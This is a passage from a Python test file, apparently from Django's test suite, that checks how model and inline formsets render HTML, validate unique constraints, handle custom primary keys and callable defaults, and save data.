self.assertEqual(author1, BetterAuthor.objects.get(name='Ernest Hemingway'))
hemingway_id = BetterAuthor.objects.get(name="Ernest Hemingway").pk
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Ernest Hemingway" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" value="10" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" value="%d" id="id_form-0-author_ptr" /></p>' % hemingway_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /></p>\n'
'<p><label for="id_form-1-write_speed">Write speed:</label> <input type="text" name="form-1-write_speed" id="id_form-1-write_speed" /><input type="hidden" name="form-1-author_ptr" id="id_form-1-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': hemingway_id,
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
'form-1-author_ptr': '',
'form-1-name': '',
'form-1-write_speed': '',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
self.assertEqual(formset.save(), [])
def test_inline_formsets(self):
# We can also create a formset that is tied to a parent model. This is
# how the admin system's edit inline functionality works.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=3)
author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" id="id_book_set-0-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '0', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': '',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1, Book.objects.get(title='Les Fleurs du Mal'))
self.assertQuerysetEqual(author.book_set.all(), ['<Book: Les Fleurs du Mal>'])
# Now that we've added a book to Charles Baudelaire, let's try adding
# another one. This time though, an edit form will be available for
# every existing book.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.get(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="%d" id="id_book_set-0-id" /></p>' % (author.id, book1.id))
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book2, = saved
self.assertEqual(book2, Book.objects.get(title='Les Paradis Artificiels'))
# As you can see, 'Les Paradis Artificiels' is now a book belonging to
# Charles Baudelaire.
self.assertQuerysetEqual(author.book_set.order_by('title'), [
'<Book: Les Fleurs du Mal>',
'<Book: Les Paradis Artificiels>',
])
def test_inline_formsets_save_as_new(self):
# The save_as_new parameter lets you re-associate the data to a new
# instance. This is used in the admin for save_as functionality.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(name='Charles Baudelaire')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '2', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': '1',
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-id': '2',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=Author(), save_as_new=True)
self.assertTrue(formset.is_valid())
new_author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(data, instance=new_author, save_as_new=True)
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.title, 'Les Paradis Artificiels')
# Test using a custom prefix on an inline formset.
formset = AuthorBooksFormSet(prefix="test")
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_test-0-title">Title:</label> <input id="id_test-0-title" type="text" name="test-0-title" maxlength="100" /><input type="hidden" name="test-0-author" id="id_test-0-author" /><input type="hidden" name="test-0-id" id="id_test-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_test-1-title">Title:</label> <input id="id_test-1-title" type="text" name="test-1-title" maxlength="100" /><input type="hidden" name="test-1-author" id="id_test-1-author" /><input type="hidden" name="test-1-id" id="id_test-1-id" /></p>')
def test_inline_formsets_with_custom_pk(self):
# Test inline formsets where the inline-edited object has a custom
# primary key that is not the fk to the parent object.
AuthorBooksFormSet2 = inlineformset_factory(Author, BookWithCustomPK, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet2(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_bookwithcustompk_set-0-my_pk">My pk:</label> <input type="text" name="bookwithcustompk_set-0-my_pk" id="id_bookwithcustompk_set-0-my_pk" /></p>\n'
'<p><label for="id_bookwithcustompk_set-0-title">Title:</label> <input id="id_bookwithcustompk_set-0-title" type="text" name="bookwithcustompk_set-0-title" maxlength="100" /><input type="hidden" name="bookwithcustompk_set-0-author" value="1" id="id_bookwithcustompk_set-0-author" /></p>')
data = {
'bookwithcustompk_set-TOTAL_FORMS': '1', # the number of forms rendered
'bookwithcustompk_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithcustompk_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithcustompk_set-0-my_pk': '77777',
'bookwithcustompk_set-0-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet2(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.pk, 77777)
book1 = author.bookwithcustompk_set.get()
self.assertEqual(book1.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_multi_table_inheritance(self):
# Test inline formsets where the inline-edited object uses multi-table
# inheritance, thus has a non AutoField yet auto-created primary key.
AuthorBooksFormSet3 = inlineformset_factory(Author, AlternateBook, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet3(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_alternatebook_set-0-title">Title:</label> <input id="id_alternatebook_set-0-title" type="text" name="alternatebook_set-0-title" maxlength="100" /></p>\n'
'<p><label for="id_alternatebook_set-0-notes">Notes:</label> <input id="id_alternatebook_set-0-notes" type="text" name="alternatebook_set-0-notes" maxlength="100" /><input type="hidden" name="alternatebook_set-0-author" value="1" id="id_alternatebook_set-0-author" /><input type="hidden" name="alternatebook_set-0-book_ptr" id="id_alternatebook_set-0-book_ptr" /></p>')
data = {
'alternatebook_set-TOTAL_FORMS': '1', # the number of forms rendered
'alternatebook_set-INITIAL_FORMS': '0', # the number of forms with initial data
'alternatebook_set-MAX_NUM_FORMS': '', # the max number of forms
'alternatebook_set-0-title': 'Flowers of Evil',
'alternatebook_set-0-notes': 'English translation of Les Fleurs du Mal'
}
formset = AuthorBooksFormSet3(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.title, 'Flowers of Evil')
self.assertEqual(book1.notes, 'English translation of Les Fleurs du Mal')
@skipUnlessDBFeature('ignores_nulls_in_unique_constraints')
def test_inline_formsets_with_nullable_unique_together(self):
# Test inline formsets where the inline-edited object has a
# unique_together constraint with a nullable member
AuthorBooksFormSet4 = inlineformset_factory(Author, BookWithOptionalAltEditor, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
data = {
'bookwithoptionalalteditor_set-TOTAL_FORMS': '2', # the number of forms rendered
'bookwithoptionalalteditor_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithoptionalalteditor_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithoptionalalteditor_set-0-author': '1',
'bookwithoptionalalteditor_set-0-title': 'Les Fleurs du Mal',
'bookwithoptionalalteditor_set-1-author': '1',
'bookwithoptionalalteditor_set-1-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet4(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.author_id, 1)
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.author_id, 1)
self.assertEqual(book2.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_custom_save_method(self):
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
class PoemForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Brooklyn Bridge" just to be a jerk.
poem = super(PoemForm, self).save(commit=False)
poem.name = "Brooklyn Bridge"
if commit:
poem.save()
return poem
PoemFormSet = inlineformset_factory(Poet, Poem, form=PoemForm)
data = {
'poem_set-TOTAL_FORMS': '3', # the number of forms rendered
'poem_set-INITIAL_FORMS': '0', # the number of forms with initial data
'poem_set-MAX_NUM_FORMS': '', # the max number of forms
'poem_set-0-name': 'The Cloud in Trousers',
'poem_set-1-name': 'I',
'poem_set-2-name': '',
}
poet = Poet.objects.create(name='Vladimir Mayakovsky')
formset = PoemFormSet(data=data, instance=poet)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
poem1, poem2 = saved
self.assertEqual(poem1.name, 'Brooklyn Bridge')
self.assertEqual(poem2.name, 'Brooklyn Bridge')
# We can provide a custom queryset to our InlineFormSet:
custom_qs = Book.objects.order_by('-title')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertEqual(len(formset.forms), 5)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Paradis Artificiels" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="1" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" value="2" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" value="3" id="id_book_set-2-id" /></p>')
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_book_set-3-title">Title:</label> <input id="id_book_set-3-title" type="text" name="book_set-3-title" maxlength="100" /><input type="hidden" name="book_set-3-author" value="1" id="id_book_set-3-author" /><input type="hidden" name="book_set-3-id" id="id_book_set-3-id" /></p>')
self.assertHTMLEqual(formset.forms[4].as_p(),
'<p><label for="id_book_set-4-title">Title:</label> <input id="id_book_set-4-title" type="text" name="book_set-4-title" maxlength="100" /><input type="hidden" name="book_set-4-author" value="1" id="id_book_set-4-author" /><input type="hidden" name="book_set-4-id" id="id_book_set-4-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '5', # the number of forms rendered
'book_set-INITIAL_FORMS': '3', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Paradis Artificiels',
'book_set-1-id': str(book2.id),
'book_set-1-title': 'Les Fleurs du Mal',
'book_set-2-id': str(book3.id),
'book_set-2-title': 'Flowers of Evil',
'book_set-3-title': 'Revue des deux mondes',
'book_set-4-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
custom_qs = Book.objects.filter(title__startswith='F')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="3" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book3.id),
'book_set-0-title': 'Flowers of Evil',
'book_set-1-title': 'Revue des deux mondes',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
def test_custom_pk(self):
# We need to ensure that it is displayed
CustomPrimaryKeyFormSet = modelformset_factory(CustomPrimaryKey)
formset = CustomPrimaryKeyFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-my_pk">My pk:</label> <input id="id_form-0-my_pk" type="text" name="form-0-my_pk" maxlength="10" /></p>\n'
'<p><label for="id_form-0-some_field">Some field:</label> <input id="id_form-0-some_field" type="text" name="form-0-some_field" maxlength="100" /></p>')
# Custom primary keys with ForeignKey, OneToOneField and AutoField ############
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Owner, extra=2, can_delete=False)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" id="id_owner_set-0-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '2',
'owner_set-INITIAL_FORMS': '0',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': '',
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner1, = saved
self.assertEqual(owner1.name, 'Joe Perry')
self.assertEqual(owner1.place.name, 'Giordanos')
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" value="Joe Perry" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" value="%d" id="id_owner_set-0-auto_id" /></p>'
% owner1.auto_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_owner_set-2-name">Name:</label> <input id="id_owner_set-2-name" type="text" name="owner_set-2-name" maxlength="100" /><input type="hidden" name="owner_set-2-place" value="1" id="id_owner_set-2-place" /><input type="hidden" name="owner_set-2-auto_id" id="id_owner_set-2-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '3',
'owner_set-INITIAL_FORMS': '1',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': six.text_type(owner1.auto_id),
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': 'Jack Berry',
'owner_set-2-auto_id': '',
'owner_set-2-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner2, = saved
self.assertEqual(owner2.name, 'Jack Berry')
self.assertEqual(owner2.place.name, 'Giordanos')
# Ensure a custom primary key that is a ForeignKey or OneToOneField get rendered for the user to choose.
FormSet = modelformset_factory(OwnerProfile)
formset = FormSet()
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-owner">Owner:</label> <select name="form-0-owner" id="id_form-0-owner">\n'
'<option value="" selected="selected">---------</option>\n'
'<option value="%d">Joe Perry at Giordanos</option>\n'
'<option value="%d">Jack Berry at Giordanos</option>\n'
'</select></p>\n'
'<p><label for="id_form-0-age">Age:</label> <input type="text" name="form-0-age" id="id_form-0-age" /></p>'
% (owner1.auto_id, owner2.auto_id))
owner1 = Owner.objects.get(name='Joe Perry')
FormSet = inlineformset_factory(Owner, OwnerProfile, max_num=1, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '0',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': '',
'ownerprofile-0-age': '54',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 54)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" value="54" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '1',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': six.text_type(owner1.auto_id),
'ownerprofile-0-age': '55',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 55)
def test_unique_true_enforces_max_num_one(self):
# ForeignKey with unique=True should enforce max_num=1
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Location, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_location_set-0-lat">Lat:</label> <input id="id_location_set-0-lat" type="text" name="location_set-0-lat" maxlength="100" /></p>\n'
'<p><label for="id_location_set-0-lon">Lon:</label> <input id="id_location_set-0-lon" type="text" name="location_set-0-lon" maxlength="100" /><input type="hidden" name="location_set-0-place" value="1" id="id_location_set-0-place" /><input type="hidden" name="location_set-0-id" id="id_location_set-0-id" /></p>')
def test_foreign_keys_in_parents(self):
self.assertEqual(type(_get_foreign_key(Restaurant, Owner)), models.ForeignKey)
self.assertEqual(type(_get_foreign_key(MexicanRestaurant, Owner)), models.ForeignKey)
def test_unique_validation(self):
FormSet = modelformset_factory(Product, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
product1, = saved
self.assertEqual(product1.slug, 'car-red')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'slug': ['Product with this Slug already exists.']}])
def test_unique_together_validation(self):
FormSet = modelformset_factory(Price, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
price1, = saved
self.assertEqual(price1.price, Decimal('12.00'))
self.assertEqual(price1.quantity, 1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Price with this Price and Quantity already exists.']}])
def test_unique_together_with_inlineformset_factory(self):
# Also see bug #8882.
repository = Repository.objects.create(name='Test Repo')
FormSet = inlineformset_factory(Repository, Revision, extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
revision1, = saved
self.assertEqual(revision1.repository, repository)
self.assertEqual(revision1.revision, '146239817507f148d448db38840db7c3cbf47c76')
# attempt to save the same revision against against the same repo.
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Revision with this Repository and Revision already exists.']}])
# unique_together with inlineformset_factory with overridden form fields
# Also see #9494
FormSet = inlineformset_factory(Repository, Revision, fields=('revision',), extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
def test_callable_defaults(self):
# Use of callable defaults (see bug #7975).
person = Person.objects.create(name='Ringo')
FormSet = inlineformset_factory(Person, Membership, can_delete=False, extra=1)
formset = FormSet(instance=person)
# Django will render a hidden field for model fields that have a callable
# default. This is required to ensure the value is tested for change correctly
# when determine what extra forms have changed to save.
self.assertEqual(len(formset.forms), 1) # this formset only has one form
form = formset.forms[0]
now = form.fields['date_joined'].initial()
result = form.as_p()
result = re.sub(r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?', '__DATETIME__', result)
self.assertHTMLEqual(result,
'<p><label for="id_membership_set-0-date_joined">Date joined:</label> <input type="text" name="membership_set-0-date_joined" value="__DATETIME__" id="id_membership_set-0-date_joined" /><input type="hidden" name="initial-membership_set-0-date_joined" value="__DATETIME__" id="initial-membership_set-0-id_membership_set-0-date_joined" /></p>\n'
'<p><label for="id_membership_set-0-karma">Karma:</label> <input type="text" name="membership_set-0-karma" id="id_membership_set-0-karma" /><input type="hidden" name="membership_set-0-person" value="%d" id="id_membership_set-0-person" /><input type="hidden" name="membership_set-0-id" id="id_membership_set-0-id" /></p>'
% person.id)
# test for validation with callable defaults. Validations rely on hidden fields
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
# now test for when the data changes
one_day_later = now + datetime.timedelta(days=1)
filled_data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(one_day_later.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(filled_data, instance=person)
self.assertFalse(formset.is_valid())
# now test with split datetime fields
class MembershipForm(forms.ModelForm):
date_joined = forms.SplitDateTimeField(initial=now)
class Meta:
model = Membership
def __init__(self, **kwargs):
super(MembershipForm, self).__init__(**kwargs)
self.fields['date_joined'].widget = forms.SplitDateTimeWidget()
FormSet = inlineformset_factory(Person, Membership, form=MembershipForm, can_delete=False, extra=1)
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined_0': six.text_type(now.strftime('%Y-%m-%d')),
'membership_set-0-date_joined_1': six.text_type(now.strftime('%H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
def test_inlineformset_factory_with_null_fk(self):
# inlineformset_factory tests with fk having null=True. see #9462.
# create some data that will exbit the issue
team = Team.objects.create(name="Red Vipers")
Player(name="Timmy").save()
Player(name="Bobby", team=team).save()
PlayerInlineFormSet = inlineformset_factory(Team, Player)
formset = PlayerInlineFormSet()
